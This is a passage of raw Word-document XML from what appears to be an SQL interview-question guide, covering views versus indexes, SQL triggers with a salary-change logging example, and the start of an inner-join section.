          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes are automatically created on primary keys and foreign key columns, which improves the performance of joins and data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B6475"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EAA8E8">
          <v:rect id="_x0000_i3231" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D29B39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853"/>
        <w:gridCol w:w="4728"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="398073E4" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23DAC46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AE6204"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF2F3D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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="3E4B7B40" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FEAB8F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3AC5912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virtual table defined by a SELECT query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485D4C7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database object that improves query performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="083DC8A9" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70C4100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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA8BFB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 not store data, only a query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60CF35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tores pointers to rows in the table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="1B535AD3" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4547B98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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BA4A05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implifies complex queries or restricts access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25A7397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execution by allowing faster lookups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="779B1925" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D0220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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36B6240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s no impact on performance (depends on query)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0492322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query performance, especially SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="42C20B36" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1420A0D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Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C84B6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read-only or updatable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19007CD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not directly modify data (only used for search optimization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="2908CD2C" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2934FEE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eation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71245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VIEW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="194C8EA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INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="2D0F0EE7" w14:textId="77777777" w:rsidTr="002E6CA2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51B3CF2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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A1FC20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No direct cost, but can increase query complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F6411E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creases storage and update costs (due to maintenance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35BB7AC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summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462DDD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ews</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide a way to present data in a more readable or restricted manner without changing the underlying data structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE66DD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dexes</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to enhance the performance of data retrieval operations at the cost of additional storage and slower write operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B1E6C" w14:textId="5B8689A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3232" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD6E43" w14:textId="5334823B"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73" w:name="_Toc197867987"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Trigger in SQL? What is the use of Trigger in SQL?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="773"/>
    </w:p>
    <w:p w14:paraId="02FB2089" w14:textId="35A2213A" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF"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Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL is a special kind of stored procedure that automatically executes or fires when a specific event occurs on a table or view. The event could be an </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INSER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UPDATE</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DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation. Triggers are often used to enforce data integrity, automatically update or log changes, or perform actions in response to specific changes in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771BD59F"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Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF3B4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ed Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers are fired automatically by the database when a specified event occurs on a table or view. You do not need to manually invoke a trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1458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Triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2205B4E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EFORE Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes before the triggering event (INSERT, UPDATE, DELETE) is performed on the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFAA0F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FTER Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes after the triggering event (INSERT, UPDATE, DELETE) is performed on the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE1EC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STEAD OF Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to perform an action instead of the triggering event (typically used with views).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEF026C"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ctions</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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vent-Driven</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers are event-driven and tied to a specific database event such as inserting a new record or updating a column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A20948"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Trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604AC15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syntax for creating a trigger depends on the SQL database you're using, but here’s a general structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE8B4B9"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trigger_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3069EFE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BEFORE|AFTER} {INSERT|UPDATE|DELETE} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B26455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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E15A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06D2ABB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5B12A72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 trigger action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A47AC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ND;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42073A26"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Trigger in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4EA86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assume you have an employees table, and you want to automatically log every time an employee's salary is updated in the salary_changes_log table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A081F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able Definitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A7B4AD"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s (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB550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 PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05898A8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name VARCHAR(100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894B54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salary DECIMAL(10, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB93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0D5A4BDF" w14:textId="77777777" w:rsidR="00DE64CF" w:rsidRPr="0085313D" w:rsidRDefault="00DE64CF" w:rsidP="0085313D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1D641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salary_changes_log (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E954AB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og_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FA36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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200C48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old_salary DECIMAL(10, 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1257D52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new_salary DECIMAL(10, 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99974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change_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C812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1303047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rigger to Log Salary Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF20A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log_salary_changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26253F5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FTER UPDATE ON employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC23A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4CF0B43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493E16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F OLD.salary &lt;&gt; NEW.salary THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF2A7C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NSERT INTO salary_changes_log (employee_id, old_salary, new_salary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C929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VALUES (NEW.employee_id, OLD.salary, NEW.salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103024A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ND IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA582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1C13DEC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41573F2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e trigger log_salary_changes is fired </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AFTER UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1DBAF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the salary of an employee changes, the trigger will insert the old and new salary into the salary_changes_log table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A77B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of Triggers in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0579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are used in various scenarios. Some common use cases include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E069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Business Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F9F8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eventing a certain action (e.g., DELETE) from occurring if some condition is not met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08D61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the deletion of a record from the employees table if an employee has ongoing tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470AF3F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 and Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E5E5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logging changes to sensitive data for auditing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B60301"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log any data modifications (INSERT, UPDATE, DELETE) to an audit table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DF73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Referential Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01218ECA"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ing that certain data relationships are maintained automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6F896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if you delete an employee, you might want to automatically remove their associated records from a related table (like tasks or projects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F6A00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cally Updating Data</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466307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updating certain columns in response to data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F26AB"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instance, if you update a price in the products table, you might want to automatically recalculate the stock value in an inventory table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B403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Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC675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enforce complex validation rules before inserting or updating data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D61049"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ensuring that an employee’s salary is always greater than a certain threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B8E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eventing Invalid Transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D7618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rolling back transactions that do not meet certain conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C55062"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an update to a bank_balance if the amount is less than zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A99F5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Advantages of Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A536B8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Automation</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers automate the execution of certain actions in response to changes in data, which reduces manual effort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5020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Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers can enforce complex business rules and data constraints, ensuring that the data is valid and consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460D42D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w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers can help in logging changes for auditing purposes, which is especially useful in applications that require a detailed history of data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9811B"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sadvantages of Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6AA43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w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since triggers are executed automatically, they can add overhead, especially if complex operations are involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B207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idden Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Triggers execute in the background, and their actions may not always be immediately visible to users or developers, which can make troubleshooting and debugging more challenging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D89FF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ity</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Excessive use of triggers can lead to complex interdependencies between triggers, making it harder to maintain the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F869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t Always Transparent</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Because triggers execute automatically, it can sometimes be unclear to developers what changes are being made to the database, especially if the logic inside the trigger is complicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B524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w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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3233" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3842B0ED" w14:textId="0E50FC00"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74" w:name="_Toc197867988"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is inner join in SQL?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="774"/>
    </w:p>
    <w:p w14:paraId="06328749" w14:textId="2933EF9B" w:rsidR="00185F20" w:rsidRPr="0085313D" w:rsidRDefault="00185F20"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in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7CB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of INNER JOIN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267120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s</w:t>
